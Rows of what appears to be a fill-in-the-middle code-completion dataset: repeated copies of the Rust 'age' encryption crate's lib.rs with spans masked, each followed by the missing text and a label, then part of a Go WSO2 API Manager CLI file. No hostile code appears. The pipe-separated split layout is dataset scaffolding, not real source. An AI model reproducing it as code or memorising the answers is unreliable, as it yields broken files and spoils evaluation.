//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn | (data: &[u8]) {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
}
| fuzz_header | identifier_name |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) {
if let Ok(header) = format::Header::read(data) |
}
| {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
} | conditional_block |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) | {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
} | identifier_body |
|
api.go | package cli
import (
"errors"
"fmt"
"os"
"strings"
multierror "github.com/hashicorp/go-multierror"
wso2am "github.com/uphy/go-wso2am"
"github.com/urfave/cli"
)
func (c *CLI) api() cli.Command {
return cli.Command{
Name: "api",
Aliases: []string{"a"},
Usage: "API management command",
Subcommands: cli.Commands{
c.apiList(),
c.apiChangeStatus(),
c.apiDelete(),
c.apiInspect(),
c.apiSwagger(),
c.apiUpdateSwagger(),
c.apiUploadThumbnail(),
c.apiThumbnail(),
c.apiCreate(true),
c.apiCreate(false),
},
}
}
func (c *CLI) apiList() cli.Command {
trim := func(s string, maxWidth int) string {
s = strings.Replace(s, "\r\n", "\\n", -1)
s = strings.Replace(s, "\n", "\\n", -1)
s = strings.Replace(s, "\r", "\\n", -1)
width := 0
runes := []rune(s)
result := []rune{}
for _, r := range runes {
if r < 0x80 {
width++
} else {
width += 2
}
if width > maxWidth {
break
}
result = append(result, r)
}
return string(result)
}
return cli.Command{
Name: "list",
Aliases: []string{"ls", "dir"},
Usage: "List APIs",
Flags: []cli.Flag{
cli.StringFlag{
Name: "query,q",
Value: "",
},
},
Action: func(ctx *cli.Context) error {
var query = ctx.String("query")
return list(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(query, entryc, errc, done)
}, func(table *TableFormatter) {
table.Header("ID", "Name", "Version", "Description", "Status")
}, func(entry interface{}, table *TableFormatter) {
api := c.client.ConvertToAPI(entry)
table.Row(api.ID, api.Name, api.Version, trim(api.Description, 30), api.Status)
})
},
}
}
func (c *CLI) apiChangeStatus() cli.Command {
return cli.Command{
Name: "change-status",
Usage: "Change API status",
Description: fmt.Sprintf(`Change API status.
Available actions are:
- %s
- %s
- %s
- %s
- %s
- %s
- %s
- %s
`, wso2am.APIActionPublish, wso2am.APIActionDeployAsPrototype, wso2am.APIActionDemoteToCreated, wso2am.APIActionDemoteToPrototyped, wso2am.APIActionBlock, wso2am.APIActionDeprecate, wso2am.APIActionRePublish, wso2am.APIActionRetire),
ArgsUsage: "ID ACTION",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and ACTION are required")
}
id := ctx.Args().Get(0)
action := ctx.Args().Get(1)
return c.client.ChangeAPIStatus(id, wso2am.APIAction(action))
},
}
}
func (c *CLI) apiDelete() cli.Command |
func (c *CLI) apiInspect() cli.Command {
return cli.Command{
Name: "inspect",
Aliases: []string{"show", "cat"},
Usage: "Inspect the API",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
api, err := c.client.API(id)
if err != nil {
return err
}
return c.inspect(api)
},
}
}
func (c *CLI) apiSwagger() cli.Command {
return cli.Command{
Name: "swagger",
Usage: "Inspect the API definition",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
def, err := c.client.APIDefinition(id)
if err != nil {
return err
}
return c.inspect(def)
},
}
}
func (c *CLI) apiUpdateSwagger() cli.Command {
return cli.Command{
Name: "update-swagger",
Usage: "Update the API definition",
ArgsUsage: "ID SWAGGERFILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and SWAGGERFILE are required")
}
id := ctx.Args().Get(0)
def, err := wso2am.NewAPIDefinitionFromFile(ctx.Args().Get(1))
if err != nil {
return err
}
if _, err := c.client.UpdateAPIDefinition(id, def); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiThumbnail() cli.Command {
return cli.Command{
Name: "thumbnail",
Usage: "Download the thumbnail",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
return c.client.Thumbnail(id, os.Stdout)
},
}
}
func (c *CLI) apiUploadThumbnail() cli.Command {
return cli.Command{
Name: "upload-thumbnail",
Usage: "Upload the thumbnail",
ArgsUsage: "ID FILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and FILE are required")
}
id := ctx.Args().Get(0)
file := ctx.Args().Get(1)
f, err := os.Open(file)
if err != nil {
return err
}
defer f.Close()
if _, err := c.client.UploadThumbnail(id, f); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiCreate(update bool) cli.Command {
var commandName string
var commandAliases []string
var commandUsage string
var commandArgsUsage string
flags := []cli.Flag{
cli.StringFlag{
